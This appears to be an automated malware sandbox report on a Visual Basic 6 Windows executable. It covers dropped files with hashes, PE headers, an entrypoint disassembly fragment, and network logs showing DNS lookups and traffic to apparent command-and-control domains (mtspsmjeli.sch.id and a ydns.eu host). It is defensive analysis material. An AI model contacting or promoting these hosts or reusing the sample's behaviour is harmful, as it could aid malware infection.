                                          SHA1:D7B825402FFFD08C882A3B05129E92D0FE964CAE
                                          SHA-256:38D43DB6662484B3E873AC23026A9FE20E80B322579039F4B25AEB8E60318A42
                                          SHA-512:37325EB6DB0F73E3225B962E7263F76E7102835DB54495F4A23D4B22B56906EFEE14A446374C48E0DEF60E4E590BF04E032129AD54D2680E72B5D2891C600853
                                          Malicious:true
                                          Preview: :.HA5..H
                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):56
                                          Entropy (8bit):4.787365359936823
                                          Encrypted:false
                                          SSDEEP:3:oMty8WbSXgL4A:oMLWuQL4A
                                          MD5:EFD1636CFC3CC38FD7BABAE5CAC9EDE0
                                          SHA1:4D7D378ABEB682EEFBD039930C0EA996FBF54178
                                          SHA-256:F827D5B11C1EB3902D601C3E0B59BA32FE11C0B573FBF22FB2AF86BFD4651BBA
                                          SHA-512:69B2B0AB1A6E13395EF52DCB903B8E17D842E6D0D44F801FF2659CFD5EC343C8CC57928B02961FC7099AD43FF05633BAF5AC39042A00C8676D4FA8F6F8C2A5D7
                                          Malicious:false
                                          Preview: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          \Device\ConDrv
                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):236
                                          Entropy (8bit):4.932081504780073
                                          Encrypted:false
                                          SSDEEP:3:RGXKRjN3Mxm8fWWD2XBQFwuSaKwDDxRZjmKXVM8xUvAkIDaMAfFAqmV/l7pgechG:zx3M7J4BYRZBXVwLL0dxKaRFfnYJin
                                          MD5:3140AF53A08CE269E95F15F02653B5CA
                                          SHA1:1248AB171A7006A8972B07C8128E346C4E3C1E4E
                                          SHA-256:041D7B8A2F516085263D3022FCD2B716AD212FE564DC2CB5AC5D7E128BEAA257
                                          SHA-512:BB4DFF011D831D8CD6BA923E440B5B4C2A41BA118BA3D73AF0CC866C2FAD23003ACA86C27691E8CF9F37CA336A329D4B8683CFB70E3BF4BD8A5C5421E4DF62D3
                                          Malicious:false
                                          Preview: Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.8922..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....RegAsm : error RA0000 : Unable to locate input assembly '0' or one of its dependencies...

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):5.174708300114262
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:SecuriteInfo.com.Variant.Razy.845229.13077.exe
                                          File size:106496
                                          MD5:532e58083cf5638b05f617fcbbb5d63b
                                          SHA1:98058e52de678575ff2327d129a58313af4a3fc0
                                          SHA256:75888910c75a9858137089eb35d48b6b1af6d43817e9a1dbb9fbc409fdaad511
                                          SHA512:eab390f92d05fcc3ba8d0474555c1db78becfdb81865d4fada0c292a3e50ea6ed00b875b99e5a4d6fd96fc3116416858b1c574e8d14b0564524e8eac849ed20a
                                          SSDEEP:1536:3qN/HQiDkZQzBkKgIYNP7dmoK2gKpKeBEYjBqN/HQi:gkZQzB6IY9dEKpKng
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L...\L.J.................@...p......x........P....@

                                          File Icon

                                          Icon Hash:d8d490d4c4bcdef9

                                          Static PE Info

                                          General

                                          Entrypoint:0x401378
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x4A164C5C [Fri May 22 06:55:24 2009 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:5fb04c04dc9621084e24b4642ca2fed6

                                          Entrypoint Preview

                                          Instruction
                                          push 004100F0h
                                          call 00007F46F8CA4D95h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          xor byte ptr [eax], al
                                          add byte ptr [eax], al
                                          inc eax
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax+4Dh], bh
                                          enter 4739h, E0h
                                          test byte ptr [eax-72h], FFFFFFDAh
                                          popad
                                          or eax, 06084A40h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add dword ptr [eax], eax
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          push ebx
                                          jo 00007F46F8CA4E07h
                                          popad
                                          imul esp, dword ptr [ebp+72h], 70h
                                          push 66656E6Fh
                                          popad
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          dec esp
                                          xor dword ptr [eax], eax
                                          or eax, 337C8890h
                                          add edx, dword ptr [ebx]
                                          dec edx
                                          xchg edx, esp
                                          add eax, esp
                                          jmp 00007F46F8CA4D59h
                                          and eax, 50F2FD35h
                                          je 00007F46F8CA4D6Ch
                                          jnle 00007F46F8CA4DEFh
                                          xchg eax, ebp
                                          les eax, fword ptr [edx]
                                          wait
                                          lodsb
                                          stosd
                                          movsb
                                          lea edi, dword ptr [edx]
                                          dec edi
                                          lodsd
                                          xor ebx, dword ptr [ecx-48EE309Ah]
                                          or al, 00h
                                          stosb
                                          add byte ptr [eax-2Dh], ah
                                          xchg eax, ebx
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          daa
                                          fld qword ptr [eax]
                                          add byte ptr [eax+2Dh], cl
                                          add byte ptr [eax], al
                                          add byte ptr [ecx], cl
                                          add byte ptr [ecx+70h], ah
                                          jo 00007F46F8CA4E14h
                                          outsd
                                          bound esp, dword ptr [ecx+74h]
                                          imul eax, dword ptr [eax], 000B010Dh
                                          inc esp
                                          outsb
                                          outsd
                                          insd

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x141240x28.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x3084.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x114.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x135ec0x14000False0.337573242188data5.7034958497IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .data0x150000x25600x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .rsrc0x180000x30840x4000False0.105895996094data3.23453967052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x193dc0x1ca8data
                                          RT_ICON0x187340xca8data
                                          RT_ICON0x183cc0x368GLS_BINARY_LSB_FIRST
                                          RT_GROUP_ICON0x1839c0x30data
                                          RT_VERSION0x181500x24cdataHungarianHungary

                                          Imports

                                          DLLImport
                                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                          Version Infos

                                          DescriptionData
                                          Translation0x040e 0x04b0
                                          InternalNameCompurgato
                                          FileVersion1.00
                                          CompanyNameColdStone
                                          CommentsColdStone
                                          ProductNameColdStone
                                          ProductVersion1.00
                                          OriginalFilenameCompurgato.exe

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          HungarianHungary

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          02/23/21-11:57:30.237786ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Feb 23, 2021 11:57:29.280534983 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.519085884 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.519177914 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.519809961 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.757846117 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758059978 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758138895 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.758244038 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758263111 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758280039 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758291960 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.758296967 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758323908 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.758330107 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758371115 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.758378983 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758399010 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758440018 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.758719921 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.758763075 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997093916 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997114897 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997128010 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997139931 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997268915 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997319937 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997556925 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997575045 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997591019 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997607946 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997611046 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997625113 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997639894 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997646093 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997663975 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997668982 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997680902 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997698069 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997699976 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997714996 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997723103 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997730970 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997746944 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997761965 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997761965 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997781992 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:29.997801065 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:29.997833014 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.238229036 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.238250971 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.238266945 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.238286018 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.238307953 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.238326073 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.238327026 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.238348961 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.238365889 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.238420010 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241105080 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241126060 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241143942 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241168022 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241188049 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241194963 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241208076 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241219044 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241240978 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241240978 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241265059 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241282940 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241288900 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241316080 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241322994 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241338968 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241352081 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241367102 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241410971 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241415024 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241422892 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241437912 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241451979 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241461039 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241477013 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241487026 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241498947 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241511106 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241525888 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241538048 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241549969 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241561890 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241573095 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241585016 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241597891 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241607904 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241624117 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241625071 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241641998 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241647959 CET4974180192.168.2.5103.150.60.242
                                          Feb 23, 2021 11:57:30.241660118 CET8049741103.150.60.242192.168.2.5
                                          Feb 23, 2021 11:57:30.241676092 CET8049741103.150.60.242192.168.2.5

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Feb 23, 2021 11:53:27.402848005 CET5430253192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:27.451468945 CET53543028.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:27.548495054 CET5378453192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:27.597136974 CET53537848.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:27.601881981 CET6530753192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:27.653352976 CET53653078.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:27.753978014 CET6434453192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:27.802653074 CET53643448.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:27.810460091 CET6206053192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:27.859040022 CET53620608.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:27.919210911 CET6180553192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:27.967927933 CET53618058.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:30.684515953 CET5479553192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:30.733191013 CET53547958.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:30.863934040 CET4955753192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:30.922516108 CET53495578.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:31.931307077 CET6173353192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:31.979897976 CET53617338.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:33.173508883 CET6544753192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:33.225016117 CET53654478.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:34.183844090 CET5244153192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:34.232310057 CET53524418.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:37.819720030 CET6217653192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:37.878554106 CET53621768.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:54.709980011 CET5959653192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:54.771769047 CET53595968.8.8.8192.168.2.5
                                          Feb 23, 2021 11:53:59.117594004 CET6529653192.168.2.58.8.8.8
                                          Feb 23, 2021 11:53:59.169214964 CET53652968.8.8.8192.168.2.5
                                          Feb 23, 2021 11:54:00.076630116 CET6318353192.168.2.58.8.8.8
                                          Feb 23, 2021 11:54:00.134829998 CET53631838.8.8.8192.168.2.5
                                          Feb 23, 2021 11:54:03.667221069 CET6015153192.168.2.58.8.8.8
                                          Feb 23, 2021 11:54:03.718749046 CET53601518.8.8.8192.168.2.5
                                          Feb 23, 2021 11:54:04.970557928 CET5696953192.168.2.58.8.8.8
                                          Feb 23, 2021 11:54:05.023955107 CET53569698.8.8.8192.168.2.5
                                          Feb 23, 2021 11:54:06.463258028 CET5516153192.168.2.58.8.8.8
                                          Feb 23, 2021 11:54:06.523981094 CET53551618.8.8.8192.168.2.5
                                          Feb 23, 2021 11:54:22.320291996 CET5475753192.168.2.58.8.8.8
                                          Feb 23, 2021 11:54:22.371752024 CET53547578.8.8.8192.168.2.5
                                          Feb 23, 2021 11:54:23.040867090 CET4999253192.168.2.58.8.8.8
                                          Feb 23, 2021 11:54:23.091963053 CET53499928.8.8.8192.168.2.5
                                          Feb 23, 2021 11:54:23.203481913 CET6007553192.168.2.58.8.8.8
                                          Feb 23, 2021 11:54:23.252090931 CET53600758.8.8.8192.168.2.5
                                          Feb 23, 2021 11:54:41.438749075 CET5501653192.168.2.58.8.8.8
                                          Feb 23, 2021 11:54:41.487498045 CET53550168.8.8.8192.168.2.5
                                          Feb 23, 2021 11:55:27.035197020 CET6434553192.168.2.58.8.8.8
                                          Feb 23, 2021 11:55:27.083903074 CET53643458.8.8.8192.168.2.5
                                          Feb 23, 2021 11:55:45.315054893 CET5712853192.168.2.58.8.8.8
                                          Feb 23, 2021 11:55:45.373301029 CET53571288.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:22.429409981 CET5479153192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:22.497596979 CET53547918.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:23.086483002 CET5046353192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:23.146323919 CET53504638.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:23.750447035 CET5039453192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:23.807349920 CET53503948.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:24.334043980 CET5853053192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:24.415599108 CET53585308.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:24.975594044 CET5381353192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:25.034773111 CET53538138.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:25.765847921 CET6373253192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:25.823873043 CET53637328.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:26.480931997 CET5734453192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:26.539541006 CET53573448.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:26.806000948 CET5445053192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:26.876113892 CET53544508.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:27.475321054 CET5926153192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:27.524157047 CET53592618.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:30.790479898 CET5715153192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:30.894408941 CET53571518.8.8.8192.168.2.5
                                          Feb 23, 2021 11:56:32.489547014 CET5941353192.168.2.58.8.8.8
                                          Feb 23, 2021 11:56:32.541115046 CET53594138.8.8.8192.168.2.5
                                          Feb 23, 2021 11:57:27.851294994 CET6051653192.168.2.58.8.8.8
                                          Feb 23, 2021 11:57:28.869720936 CET6051653192.168.2.58.8.8.8
                                          Feb 23, 2021 11:57:29.251405001 CET53605168.8.8.8192.168.2.5
                                          Feb 23, 2021 11:57:30.237633944 CET53605168.8.8.8192.168.2.5
                                          Feb 23, 2021 11:57:34.310029030 CET5164953192.168.2.58.8.8.8
                                          Feb 23, 2021 11:57:34.393537045 CET53516498.8.8.8192.168.2.5
                                          Feb 23, 2021 11:57:44.481472969 CET6508653192.168.2.58.8.8.8
                                          Feb 23, 2021 11:57:44.550745964 CET53650868.8.8.8192.168.2.5
                                          Feb 23, 2021 11:57:52.497247934 CET5643253192.168.2.58.8.8.8
                                          Feb 23, 2021 11:57:52.563999891 CET53564328.8.8.8192.168.2.5
                                          Feb 23, 2021 11:58:00.529602051 CET5292953192.168.2.58.8.8.8
                                          Feb 23, 2021 11:58:00.589838982 CET53529298.8.8.8192.168.2.5
                                          Feb 23, 2021 11:58:08.592498064 CET6431753192.168.2.58.8.8.8
                                          Feb 23, 2021 11:58:08.652335882 CET53643178.8.8.8192.168.2.5

                                          ICMP Packets

                                          TimestampSource IPDest IPChecksumCodeType
                                          Feb 23, 2021 11:57:30.237786055 CET192.168.2.58.8.8.8d006(Port unreachable)Destination Unreachable

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Feb 23, 2021 11:57:27.851294994 CET192.168.2.58.8.8.80xc660Standard query (0)mtspsmjeli.sch.idA (IP address)IN (0x0001)
                                          Feb 23, 2021 11:57:28.869720936 CET192.168.2.58.8.8.80xc660Standard query (0)mtspsmjeli.sch.idA (IP address)IN (0x0001)
                                          Feb 23, 2021 11:57:34.310029030 CET192.168.2.58.8.8.80x8e87Standard query (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.euA (IP address)IN (0x0001)
                                          Feb 23, 2021 11:57:44.481472969 CET192.168.2.58.8.8.80x725fStandard query (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.euA (IP address)IN (0x0001)
                                          Feb 23, 2021 11:57:52.497247934 CET192.168.2.58.8.8.80x9558Standard query (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.euA (IP address)IN (0x0001)
                                          Feb 23, 2021 11:58:00.529602051 CET192.168.2.58.8.8.80x65e3Standard query (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.euA (IP address)IN (0x0001)
                                          Feb 23, 2021 11:58:08.592498064 CET192.168.2.58.8.8.80xfacaStandard query (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.euA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Feb 23, 2021 11:57:29.251405001 CET8.8.8.8192.168.2.50xc660No error (0)mtspsmjeli.sch.id103.150.60.242A (IP address)IN (0x0001)
                                          Feb 23, 2021 11:57:30.237633944 CET8.8.8.8192.168.2.50xc660No error (0)mtspsmjeli.sch.id103.150.60.242A (IP address)IN (0x0001)
                                          Feb 23, 2021 11:57:34.393537045 CET8.8.8.8192.168.2.50x8e87No error (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu10.2.118.40A (IP address)IN (0x0001)
                                          Feb 23, 2021 11:57:44.550745964 CET8.8.8.8192.168.2.50x725fNo error (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu10.2.118.40A (IP address)IN (0x0001)
                                          Feb 23, 2021 11:57:52.563999891 CET8.8.8.8192.168.2.50x9558No error (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu10.2.118.40A (IP address)IN (0x0001)
                                          Feb 23, 2021 11:58:00.589838982 CET8.8.8.8192.168.2.50x65e3No error (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu10.2.118.40A (IP address)IN (0x0001)
